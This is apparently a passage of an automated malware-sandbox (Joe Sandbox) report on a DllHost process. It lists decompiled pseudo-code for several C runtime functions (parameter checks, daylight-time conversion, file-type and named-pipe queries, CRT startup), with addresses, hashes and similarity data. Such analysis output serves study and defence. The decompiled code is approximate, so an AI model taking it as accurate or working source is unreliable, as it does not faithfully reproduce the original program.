				if (_t178 + 1 - 0x1000 < 0) goto 0x191b46f7;
				if ( *_t210 -  *((intOrPtr*)( *_t210 - 8)) - 8 - 0x1f > 0) goto 0x191b4735;
				0x191d23d0();
				 *((long long*)(_t210 + 0x10)) = _t212;
				 *((long long*)(_t210 + 0x18)) = 0xf;
				 *_t210 = 0;
				return E00007FF77FF7191D23B0(_t76, _t79,  *(_t189 + 0x27) ^ _t191 - 0x000000d0);
			}






























                                                                                                                                                              0x7ff7191b43f0
                                                                                                                                                              0x7ff7191b43fc
                                                                                                                                                              0x7ff7191b4408
                                                                                                                                                              0x7ff7191b4412
                                                                                                                                                              0x7ff7191b4416
                                                                                                                                                              0x7ff7191b4419
                                                                                                                                                              0x7ff7191b441c
                                                                                                                                                              0x7ff7191b4420
                                                                                                                                                              0x7ff7191b4423
                                                                                                                                                              0x7ff7191b4427
                                                                                                                                                              0x7ff7191b442b
                                                                                                                                                              0x7ff7191b442f
                                                                                                                                                              0x7ff7191b4433
                                                                                                                                                              0x7ff7191b4437
                                                                                                                                                              0x7ff7191b443b
                                                                                                                                                              0x7ff7191b443e
                                                                                                                                                              0x7ff7191b4442
                                                                                                                                                              0x7ff7191b4446
                                                                                                                                                              0x7ff7191b444e
                                                                                                                                                              0x7ff7191b4467
                                                                                                                                                              0x7ff7191b4470
                                                                                                                                                              0x7ff7191b4481
                                                                                                                                                              0x7ff7191b4487
                                                                                                                                                              0x7ff7191b448f
                                                                                                                                                              0x7ff7191b44a2
                                                                                                                                                              0x7ff7191b44af
                                                                                                                                                              0x7ff7191b44b7
                                                                                                                                                              0x7ff7191b44bd
                                                                                                                                                              0x7ff7191b44c2
                                                                                                                                                              0x7ff7191b44c6
                                                                                                                                                              0x7ff7191b44ce
                                                                                                                                                              0x7ff7191b44d2
                                                                                                                                                              0x7ff7191b44d7
                                                                                                                                                              0x7ff7191b44db
                                                                                                                                                              0x7ff7191b44e7
                                                                                                                                                              0x7ff7191b44f8
                                                                                                                                                              0x7ff7191b44fe
                                                                                                                                                              0x7ff7191b4502
                                                                                                                                                              0x7ff7191b4506
                                                                                                                                                              0x7ff7191b450e
                                                                                                                                                              0x7ff7191b4528
                                                                                                                                                              0x7ff7191b4531
                                                                                                                                                              0x7ff7191b4542
                                                                                                                                                              0x7ff7191b4548
                                                                                                                                                              0x7ff7191b4550
                                                                                                                                                              0x7ff7191b4563
                                                                                                                                                              0x7ff7191b4578
                                                                                                                                                              0x7ff7191b457e
                                                                                                                                                              0x7ff7191b4587
                                                                                                                                                              0x7ff7191b4590
                                                                                                                                                              0x7ff7191b4596
                                                                                                                                                              0x7ff7191b459d
                                                                                                                                                              0x7ff7191b45a3
                                                                                                                                                              0x7ff7191b45aa
                                                                                                                                                              0x7ff7191b45b0
                                                                                                                                                              0x7ff7191b45b4
                                                                                                                                                              0x7ff7191b45bb
                                                                                                                                                              0x7ff7191b45cb
                                                                                                                                                              0x7ff7191b45e0
                                                                                                                                                              0x7ff7191b45e9
                                                                                                                                                              0x7ff7191b45ee
                                                                                                                                                              0x7ff7191b45f2
                                                                                                                                                              0x7ff7191b45f9
                                                                                                                                                              0x7ff7191b45fd
                                                                                                                                                              0x7ff7191b4605
                                                                                                                                                              0x7ff7191b460b
                                                                                                                                                              0x7ff7191b4615
                                                                                                                                                              0x7ff7191b462a
                                                                                                                                                              0x7ff7191b4633
                                                                                                                                                              0x7ff7191b4638
                                                                                                                                                              0x7ff7191b463c
                                                                                                                                                              0x7ff7191b4644
                                                                                                                                                              0x7ff7191b4653
                                                                                                                                                              0x7ff7191b468d
                                                                                                                                                              0x7ff7191b46a2
                                                                                                                                                              0x7ff7191b46ab
                                                                                                                                                              0x7ff7191b46b0
                                                                                                                                                              0x7ff7191b46b3
                                                                                                                                                              0x7ff7191b46b8
                                                                                                                                                              0x7ff7191b46c0
                                                                                                                                                              0x7ff7191b46c6
                                                                                                                                                              0x7ff7191b46ce
                                                                                                                                                              0x7ff7191b46dd
                                                                                                                                                              0x7ff7191b46f2
                                                                                                                                                              0x7ff7191b46f7
                                                                                                                                                              0x7ff7191b46fc
                                                                                                                                                              0x7ff7191b4700
                                                                                                                                                              0x7ff7191b4708
                                                                                                                                                              0x7ff7191b472e

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3668304517-0
                                                                                                                                                              • Opcode ID: fb1e7e850368b757684afa6c324377d5cec43edbd125138204b636fa0d50d89f
                                                                                                                                                              • Instruction ID: 873c9df2382a980ce2b621387ccad7570a787feb0cd038c6b7184c9c73647b92
                                                                                                                                                              • Opcode Fuzzy Hash: fb1e7e850368b757684afa6c324377d5cec43edbd125138204b636fa0d50d89f
                                                                                                                                                              • Instruction Fuzzy Hash: 2A91AF63F54E8146FB00EF74E0483AD6372AB45BBCF909231DA1D16ADADE78D1CA9350
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191EAEA0 Relevance: 6.2, APIs: 4, Instructions: 161COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 97%
                                                                                                                                                              			E00007FF77FF7191EAEA0(signed int __edx, void* __edi, void* __rcx, void* __rdx, intOrPtr _a40, intOrPtr _a48, intOrPtr _a56) {
				signed int _v80;
				intOrPtr _v92;
				intOrPtr _v100;
				intOrPtr _v104;
				signed long long _v112;
				intOrPtr _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				unsigned int _v136;
				void* _t54;
				void* _t65;
				intOrPtr _t67;
				signed long long _t86;
				intOrPtr _t88;
				signed long long _t110;
				signed long long _t111;
				intOrPtr* _t118;
				void* _t120;
				signed long long _t138;
				void* _t143;

				_t110 =  *0x192190a0; // 0x590452ce5669
				_t111 = _t110 ^ _t143 - 0x00000078;
				_v80 = _t111;
				_t67 = __rcx - 0x76c;
				_t86 = r8d;
				_v136 = r9d;
				_t138 = __edx;
				if (_t67 - 0x46 < 0) goto 0x191eb088;
				if (_t67 - 0x44d > 0) goto 0x191eb088;
				r15d = __edx - 1;
				if (r15d - 0xb > 0) goto 0x191eb088;
				if (r8d <= 0) goto 0x191eb088;
				if (r8d -  *((intOrPtr*)(0x1920e3f0 + __edx * 4)) -  *((intOrPtr*)(0x1920e3f0 + __edx * 4 - 4)) <= 0) goto 0x191eaf41;
				if (E00007FF77FF7191E1634(_t67, r8d -  *((intOrPtr*)(0x1920e3f0 + __edx * 4)) -  *((intOrPtr*)(0x1920e3f0 + __edx * 4 - 4))) == 0) goto 0x191eb088;
				if (__edi != 2) goto 0x191eb088;
				if (_t86 - 0x1d > 0) goto 0x191eb088;
				if (_v136 - 0x17 > 0) goto 0x191eb088;
				if (r13d - 0x3b > 0) goto 0x191eb088;
				if (r12d - 0x3b > 0) goto 0x191eb088;
				_t54 = E00007FF77FF7191E1634(_t67, r12d - 0x3b);
				r14d = 0;
				if (_t54 == 0) goto 0x191eaf78;
				if (__edi - 2 <= 0) goto 0x191eaf78;
				_t88 = _t86 +  *((intOrPtr*)(0x1920e3f0 + _t138 * 4 - 4)) + 1; // executed
				E00007FF77FF7191ED8FC(_t111); // executed
				_v124 = r14d;
				_v128 = r14d;
				_v132 = r14d;
				if (E00007FF77FF7191ECEC8(_t111,  &_v124) != 0) goto 0x191eb0b4;
				if (E00007FF77FF7191ECEF8(_t111,  &_v128) != 0) goto 0x191eb0b4;
				if (E00007FF77FF7191ECF28(_t111,  &_v132) != 0) goto 0x191eb0b4;
				r8d = _t120 - 1;
				r10d = 0x51eb851f;
				r9d = r10d * (_t120 + 0x12b) >> 0x20;
				r9d = r9d >> 7;
				r9d = r9d + (r9d >> 0x1f);
				r9d = r9d - (r10d * r8d >> 0x20 >> 5) + (r10d * r8d >> 0x20 >> 5 >> 0x1f);
				asm("cdq");
				if (_a56 == 1) goto 0x191eb083;
				_v92 = _t88;
				_v100 = _t67;
				_v104 = r15d;
				_v112 = r8d;
				_v116 = r13d;
				_v120 = r12d;
				if (_a56 != 0xffffffff) goto 0x191eb07e;
				if (_v124 == 0) goto 0x191eb07e;
				if (E00007FF77FF7191ED93C( &_v120) != 0) goto 0x191eb083;
				goto 0x191eb097;
				_t118 = _v128 + ((_v136 + ((__rdx + _t111 >> 2) + 0xffffffef + r9d + (_t67 - 0x46) * 0x16d + _t88 + ((__rdx + _t111 >> 2) + 0xffffffef + r9d + (_t67 - 0x46) * 0x16d + _t88) * 2) * 8) * 0x3c + _a40) * 0x3c + _v132 + _a48;
				goto 0x191eb097;
				_t65 = E00007FF77FF7191DC854(_t118);
				 *_t118 = 0x16;
				return E00007FF77FF7191D23B0(_t65, (__rdx + _t111 >> 2) + 0xffffffef + r9d, _v80 ^ _t143 - 0x00000078);
			}

























                                                                                                                                                              0x7ff7191eaeb4
                                                                                                                                                              0x7ff7191eaebb
                                                                                                                                                              0x7ff7191eaebe
                                                                                                                                                              0x7ff7191eaec6
                                                                                                                                                              0x7ff7191eaed0
                                                                                                                                                              0x7ff7191eaed3
                                                                                                                                                              0x7ff7191eaed7
                                                                                                                                                              0x7ff7191eaedd
                                                                                                                                                              0x7ff7191eaee9
                                                                                                                                                              0x7ff7191eaeef
                                                                                                                                                              0x7ff7191eaef7
                                                                                                                                                              0x7ff7191eaf00
                                                                                                                                                              0x7ff7191eaf17
                                                                                                                                                              0x7ff7191eaf22
                                                                                                                                                              0x7ff7191eaf2b
                                                                                                                                                              0x7ff7191eaf34
                                                                                                                                                              0x7ff7191eaf45
                                                                                                                                                              0x7ff7191eaf4f
                                                                                                                                                              0x7ff7191eaf59
                                                                                                                                                              0x7ff7191eaf65
                                                                                                                                                              0x7ff7191eaf6a
                                                                                                                                                              0x7ff7191eaf6f
                                                                                                                                                              0x7ff7191eaf74
                                                                                                                                                              0x7ff7191eaf76
                                                                                                                                                              0x7ff7191eaf78
                                                                                                                                                              0x7ff7191eaf81
                                                                                                                                                              0x7ff7191eaf85
                                                                                                                                                              0x7ff7191eaf89
                                                                                                                                                              0x7ff7191eaf94
                                                                                                                                                              0x7ff7191eafa5
                                                                                                                                                              0x7ff7191eafb6
                                                                                                                                                              0x7ff7191eafc6
                                                                                                                                                              0x7ff7191eafca
                                                                                                                                                              0x7ff7191eafd8
                                                                                                                                                              0x7ff7191eafde
                                                                                                                                                              0x7ff7191eaff2
                                                                                                                                                              0x7ff7191eaffc
                                                                                                                                                              0x7ff7191eafff
                                                                                                                                                              0x7ff7191eb04d
                                                                                                                                                              0x7ff7191eb053
                                                                                                                                                              0x7ff7191eb056
                                                                                                                                                              0x7ff7191eb059
                                                                                                                                                              0x7ff7191eb05d
                                                                                                                                                              0x7ff7191eb061
                                                                                                                                                              0x7ff7191eb065
                                                                                                                                                              0x7ff7191eb069
                                                                                                                                                              0x7ff7191eb06f
                                                                                                                                                              0x7ff7191eb07c
                                                                                                                                                              0x7ff7191eb081
                                                                                                                                                              0x7ff7191eb083
                                                                                                                                                              0x7ff7191eb086
                                                                                                                                                              0x7ff7191eb088
                                                                                                                                                              0x7ff7191eb08d
                                                                                                                                                              0x7ff7191eb0b3

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _get_daylight$_isindst
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4170891091-0
                                                                                                                                                              • Opcode ID: 00f4d0433b391626d41cb3c3cbfea94ea603a7cb5eda2c4bdf4cc110495e9dcc
                                                                                                                                                              • Instruction ID: 0f42e9fca991652974d67cdcc9a989850e829f678eb39853ad39036c1b2e257f
                                                                                                                                                              • Opcode Fuzzy Hash: 00f4d0433b391626d41cb3c3cbfea94ea603a7cb5eda2c4bdf4cc110495e9dcc
                                                                                                                                                              • Instruction Fuzzy Hash: 87512972F04A128BFB15EF66A9415BCA771BB4036CF900135DE1D22AD5CB38B98BC720
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191DCA08 Relevance: 6.1, APIs: 4, Instructions: 117pipeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 64%
                                                                                                                                                              			E00007FF77FF7191DCA08(intOrPtr __edx, long long __rbx, void* __rcx, void* __r8, intOrPtr* __r9, long long _a16) {
				signed int _v56;
				signed int _v76;
				intOrPtr _v80;
				intOrPtr _v92;
				intOrPtr _v100;
				intOrPtr _v108;
				char _v112;
				signed int _v120;
				signed long long _v128;
				long long _v136;
				void* __rsi;
				void* __rbp;
				long _t38;
				intOrPtr _t41;
				int _t43;
				void* _t45;
				void* _t46;
				signed int _t48;
				intOrPtr _t61;
				long _t62;
				signed long long _t80;
				signed long long _t81;
				intOrPtr* _t83;
				intOrPtr _t92;
				signed int* _t97;
				void* _t105;

				_a16 = __rbx;
				_t80 =  *0x192190a0; // 0x590452ce5669
				_t81 = _t80 ^ _t105 - 0x00000080;
				_v56 = _t81;
				_t83 = __r9;
				r14d = __edx; // executed
				_t38 = GetFileType(??); // executed
				r15d = 1;
				asm("btr ecx, 0xf");
				if (_t38 != r15d) goto 0x191dcb0e;
				 *((intOrPtr*)(__r9 + 8)) = r15w;
				if (__rcx == 0) goto 0x191dca82;
				_v120 = _v120 & 0x00000000;
				_t97 =  &_v120;
				if (E00007FF77FF7191DCD80(_t81, __rcx, _t97, __r8) == 0) goto 0x191dcb25;
				_t41 = _v120 - 1;
				 *((intOrPtr*)(__r9 + 0x10)) = _t41;
				 *__r9 = _t41;
				_t10 = _t97 + 0x34; // 0x34
				r8d = _t10;
				E00007FF77FF7191D4A30(_t41, 0,  &_v112, _t97, __r8);
				_t43 = GetFileInformationByHandle(??, ??); // executed
				if (_t43 == 0) goto 0x191dcb29;
				_t61 = _v112;
				_t99 = __rcx;
				 *((short*)(_t83 + 6)) = E00007FF77FF7191DCC48(_t61, _t83, __r8, __rcx, __r8, _t105);
				_t45 = E00007FF77FF7191DCBAC(_t44, _t61, _v92, _t99); // executed
				 *(_t83 + 0x20) = _t81;
				_t46 = E00007FF77FF7191DCBAC(_t45, _t61, _v100, _t81); // executed
				_t92 = _v108;
				 *(_t83 + 0x18) = _t81;
				E00007FF77FF7191DCBAC(_t46, _t61, _t92,  *(_t83 + 0x20)); // executed
				 *(_t83 + 0x28) = _t81;
				 *(_t83 + 0x14) =  *(_t83 + 0x14) & 0x00000000;
				if (_v80 != 0) goto 0x191dcb01;
				_t48 = _v76;
				if (_t48 - 0x7fffffff > 0) goto 0x191dcb01;
				 *(_t83 + 0x14) = _t48;
				goto 0x191dcb85;
				E00007FF77FF7191DC854(_t81);
				 *_t81 = 0x84;
				goto 0x191dcb25;
				_t26 = _t92 - 2; // -2
				if (_t26 - r15d <= 0) goto 0x191dcb38;
				if (_t61 != 0) goto 0x191dcb29;
				E00007FF77FF7191DC854(_t81);
				 *_t81 = 9;
				goto 0x191dcb88;
				_t62 = GetLastError();
				E00007FF77FF7191DC7E4(_t62, _t81, _t83);
				goto 0x191dcb25;
				 *((intOrPtr*)(_t83 + 8)) = r15w;
				 *((intOrPtr*)(_t83 + 0x10)) = r14d;
				 *_t83 = r14d;
				_t56 =  ==  ? 0x2000 : 0x1000;
				 *((short*)(_t83 + 6)) =  ==  ? 0x2000 : 0x1000;
				if (_t62 == 2) goto 0x191dcb85;
				_v128 = _v128 & 0x00000000;
				_v136 =  &_v120;
				r9d = 0;
				r8d = 0;
				if (PeekNamedPipe(??, ??, ??, ??, ??, ??) == 0) goto 0x191dcb85;
				 *(_t83 + 0x14) = _v120;
				return E00007FF77FF7191D23B0(r15b, _v120, _v56 ^ _t105 - 0x00000080);
			}





























                                                                                                                                                              0x7ff7191dca08
                                                                                                                                                              0x7ff7191dca1e
                                                                                                                                                              0x7ff7191dca25
                                                                                                                                                              0x7ff7191dca28
                                                                                                                                                              0x7ff7191dca2f
                                                                                                                                                              0x7ff7191dca38
                                                                                                                                                              0x7ff7191dca3b
                                                                                                                                                              0x7ff7191dca43
                                                                                                                                                              0x7ff7191dca49
                                                                                                                                                              0x7ff7191dca50
                                                                                                                                                              0x7ff7191dca56
                                                                                                                                                              0x7ff7191dca5e
                                                                                                                                                              0x7ff7191dca60
                                                                                                                                                              0x7ff7191dca64
                                                                                                                                                              0x7ff7191dca72
                                                                                                                                                              0x7ff7191dca7b
                                                                                                                                                              0x7ff7191dca7d
                                                                                                                                                              0x7ff7191dca80
                                                                                                                                                              0x7ff7191dca88
                                                                                                                                                              0x7ff7191dca88
                                                                                                                                                              0x7ff7191dca8c
                                                                                                                                                              0x7ff7191dca98
                                                                                                                                                              0x7ff7191dcaa0
                                                                                                                                                              0x7ff7191dcaa6
                                                                                                                                                              0x7ff7191dcaa9
                                                                                                                                                              0x7ff7191dcab7
                                                                                                                                                              0x7ff7191dcabb
                                                                                                                                                              0x7ff7191dcac7
                                                                                                                                                              0x7ff7191dcacb
                                                                                                                                                              0x7ff7191dcad4
                                                                                                                                                              0x7ff7191dcad8
                                                                                                                                                              0x7ff7191dcadc
                                                                                                                                                              0x7ff7191dcae1
                                                                                                                                                              0x7ff7191dcae5
                                                                                                                                                              0x7ff7191dcaed
                                                                                                                                                              0x7ff7191dcaef
                                                                                                                                                              0x7ff7191dcaf7
                                                                                                                                                              0x7ff7191dcaf9
                                                                                                                                                              0x7ff7191dcafc
                                                                                                                                                              0x7ff7191dcb01
                                                                                                                                                              0x7ff7191dcb06
                                                                                                                                                              0x7ff7191dcb0c
                                                                                                                                                              0x7ff7191dcb0e
                                                                                                                                                              0x7ff7191dcb14
                                                                                                                                                              0x7ff7191dcb18
                                                                                                                                                              0x7ff7191dcb1a
                                                                                                                                                              0x7ff7191dcb1f
                                                                                                                                                              0x7ff7191dcb27
                                                                                                                                                              0x7ff7191dcb2f
                                                                                                                                                              0x7ff7191dcb31
                                                                                                                                                              0x7ff7191dcb36
                                                                                                                                                              0x7ff7191dcb3b
                                                                                                                                                              0x7ff7191dcb45
                                                                                                                                                              0x7ff7191dcb4e
                                                                                                                                                              0x7ff7191dcb51
                                                                                                                                                              0x7ff7191dcb55
                                                                                                                                                              0x7ff7191dcb59
                                                                                                                                                              0x7ff7191dcb5b
                                                                                                                                                              0x7ff7191dcb65
                                                                                                                                                              0x7ff7191dcb6a
                                                                                                                                                              0x7ff7191dcb70
                                                                                                                                                              0x7ff7191dcb7d
                                                                                                                                                              0x7ff7191dcb82
                                                                                                                                                              0x7ff7191dcbaa

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2780335769-0
                                                                                                                                                              • Opcode ID: 9be9fce4d4f4d71e195f240899e788c1bf6ddb8645c8f00ebe50e6f7b407e7eb
                                                                                                                                                              • Instruction ID: 29669a7b06d46c43b4bb6a55540a9036976825ca2188df71ab52f4ae596ddfdf
                                                                                                                                                              • Opcode Fuzzy Hash: 9be9fce4d4f4d71e195f240899e788c1bf6ddb8645c8f00ebe50e6f7b407e7eb
                                                                                                                                                              • Instruction Fuzzy Hash: A2414F22E14A418AFB14EF71E4443BDA3F1AF44BACF948835DA0D47689DF3CD48A9720
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191D277C Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 83%
                                                                                                                                                              			E00007FF77FF7191D277C(void* __edx, void* __edi, void* __ebp, void* __esp, void* __eflags, intOrPtr* __rax, long long __rbx, long long __rsi, void* __r8, void* __r9, long long _a8, long long _a16) {
				char _v24;
				void* __rdi;
				void* _t9;
				void* _t10;
				void* _t24;
				void* _t28;
				intOrPtr _t36;
				void* _t45;
				intOrPtr* _t60;
				intOrPtr* _t61;
				void* _t78;
				void* _t84;

				_t84 = __r9;
				_t76 = __rsi;
				_t62 = __rbx;
				_t60 = __rax;
				_t45 = __ebp;
				_a8 = __rbx;
				_a16 = __rsi;
				_t9 = E00007FF77FF7191D2450(1); // executed
				if (_t9 == 0) goto 0x191d28d3;
				sil = 0;
				_v24 = sil;
				_t10 = E00007FF77FF7191D2414();
				_t36 =  *0x1921ab70; // 0x2
				if (_t36 == 1) goto 0x191d28de;
				if (_t36 != 0) goto 0x191d2809;
				 *0x1921ab70 = 1;
				if (E00007FF77FF7191E2ADC(__rbx, 0x191f9538, 0x191f9570) == 0) goto 0x191d27ea;
				goto 0x191d28c3;
				E00007FF77FF7191E2A78(_t62, 0x191f94d8, 0x191f9530, __rsi, _t78); // executed
				 *0x1921ab70 = 2;
				goto 0x191d2811;
				sil = 1;
				_v24 = sil;
				E00007FF77FF7191D3260(E00007FF77FF7191D25C0(_t10, 0x191f9530));
				if ( *_t60 == 0) goto 0x191d2844;
				if (E00007FF77FF7191D2528(_t60, _t60) == 0) goto 0x191d2844;
				r8d = 0;
				_t61 =  *_t60;
				E00007FF77FF7191D3268( *0x191f94c0());
				if ( *_t61 == 0) goto 0x191d2866;
				if (E00007FF77FF7191D2528(_t61, _t61) == 0) goto 0x191d2866;
				_t71 =  *_t61;
				E00007FF77FF7191E1CF0( *_t61);
				E00007FF77FF7191E2C94(E00007FF77FF7191E2C9C(E00007FF77FF7191E241C( *_t61, _t76)));
				_t83 = _t61;
				_t74 =  *_t61;
				_t24 = E00007FF77FF7191BE580(_t10,  *_t61, __edi, _t45, __esp, E00007FF77FF7191D2528(_t61, _t61),  *_t61,  *_t61, _t61, _t76, _t84); // executed
				if (E00007FF77FF7191D30AC(_t61) == 0) goto 0x191d28e8;
				if (sil != 0) goto 0x191d289d;
				E00007FF77FF7191E1CD4( *_t61,  *_t61, _t61);
				E00007FF77FF7191D25E4(1, 0);
				_t28 = _t24;
				if (E00007FF77FF7191D30AC(_t61) == 0) goto 0x191d28f0;
				if (_v24 != 0) goto 0x191d28c1;
				E00007FF77FF7191E1CC4(_t71, _t74, _t83);
				return _t28;
			}















                                                                                                                                                              0x7ff7191d277c
                                                                                                                                                              0x7ff7191d277c
                                                                                                                                                              0x7ff7191d277c
                                                                                                                                                              0x7ff7191d277c
                                                                                                                                                              0x7ff7191d277c
                                                                                                                                                              0x7ff7191d277c
                                                                                                                                                              0x7ff7191d2781
                                                                                                                                                              0x7ff7191d2790
                                                                                                                                                              0x7ff7191d2797
                                                                                                                                                              0x7ff7191d279d
                                                                                                                                                              0x7ff7191d27a0
                                                                                                                                                              0x7ff7191d27a5
                                                                                                                                                              0x7ff7191d27ac
                                                                                                                                                              0x7ff7191d27b5
                                                                                                                                                              0x7ff7191d27bd
                                                                                                                                                              0x7ff7191d27bf
                                                                                                                                                              0x7ff7191d27de
                                                                                                                                                              0x7ff7191d27e5
                                                                                                                                                              0x7ff7191d27f8
                                                                                                                                                              0x7ff7191d27fd
                                                                                                                                                              0x7ff7191d2807
                                                                                                                                                              0x7ff7191d2809
                                                                                                                                                              0x7ff7191d280c
                                                                                                                                                              0x7ff7191d2818
                                                                                                                                                              0x7ff7191d2824
                                                                                                                                                              0x7ff7191d2830
                                                                                                                                                              0x7ff7191d2832
                                                                                                                                                              0x7ff7191d283b
                                                                                                                                                              0x7ff7191d2844
                                                                                                                                                              0x7ff7191d2850
                                                                                                                                                              0x7ff7191d285c
                                                                                                                                                              0x7ff7191d285e
                                                                                                                                                              0x7ff7191d2861
                                                                                                                                                              0x7ff7191d2876
                                                                                                                                                              0x7ff7191d287b
                                                                                                                                                              0x7ff7191d287e
                                                                                                                                                              0x7ff7191d2883
                                                                                                                                                              0x7ff7191d2891
                                                                                                                                                              0x7ff7191d2896
                                                                                                                                                              0x7ff7191d2898
                                                                                                                                                              0x7ff7191d28a1
                                                                                                                                                              0x7ff7191d28a6
                                                                                                                                                              0x7ff7191d28b3
                                                                                                                                                              0x7ff7191d28ba
                                                                                                                                                              0x7ff7191d28bc
                                                                                                                                                              0x7ff7191d28d2

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1321466686-0
                                                                                                                                                              • Opcode ID: 909851f35d45ba9041d985c4c26e8fe5e053dd6630174114f091779d566886f1
                                                                                                                                                              • Instruction ID: 923dfdf6dc20aee23e75e4a666b0f31014a5ac53712e96bba1efff65a2ca9649
                                                                                                                                                              • Opcode Fuzzy Hash: 909851f35d45ba9041d985c4c26e8fe5e053dd6630174114f091779d566886f1
                                                                                                                                                              • Instruction Fuzzy Hash: 8F312921A0894242FA15BF60B4192F9A2F1AF457BCFC44835EA1D472D3DE2CE5CFA230
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191C49A0 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 334COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 53%
                                                                                                                                                              			E00007FF77FF7191C49A0(void* __esi, long long __rbx, void* __rcx, void* __rdx, long long __rsi, void* __r11) {
				void* __rbp;
				void* _t73;
				char _t75;
				void* _t88;
				void* _t90;
				void* _t95;
				signed long long _t114;
				long long _t129;
				intOrPtr _t154;
				intOrPtr _t160;
				intOrPtr _t163;
				void* _t166;
				void* _t167;
				void* _t170;
				void* _t172;
				long long* _t173;
				void* _t175;
				signed long long _t176;
				void* _t178;
				void* _t185;
				long long _t187;

				_t185 = __r11;
				_t97 = __esi;
				 *((long long*)(_t175 + 0x18)) = __rbx;
				 *((long long*)(_t175 + 0x20)) = __rsi;
				_t173 = _t175 - 0x190;
				_t176 = _t175 - 0x290;
				_t114 =  *0x192190a0; // 0x590452ce5669
				 *(_t173 + 0x180) = _t114 ^ _t176;
				_t167 = __rdx;
				_t170 = __rcx;
				_t73 = E00007FF77FF7191C6500( *((intOrPtr*)(__rcx + 8))); // executed
				if (_t73 != 0) goto 0x191c4c0f;
				r14d = 0;
				r8d = 0x100;
				E00007FF77FF7191D4A30(_t73, 0, _t173 + 0x80, __rdx, _t178);
				 *((intOrPtr*)(_t176 + 0x38)) = r14d;
				 *((long long*)(_t176 + 0x30)) = _t187;
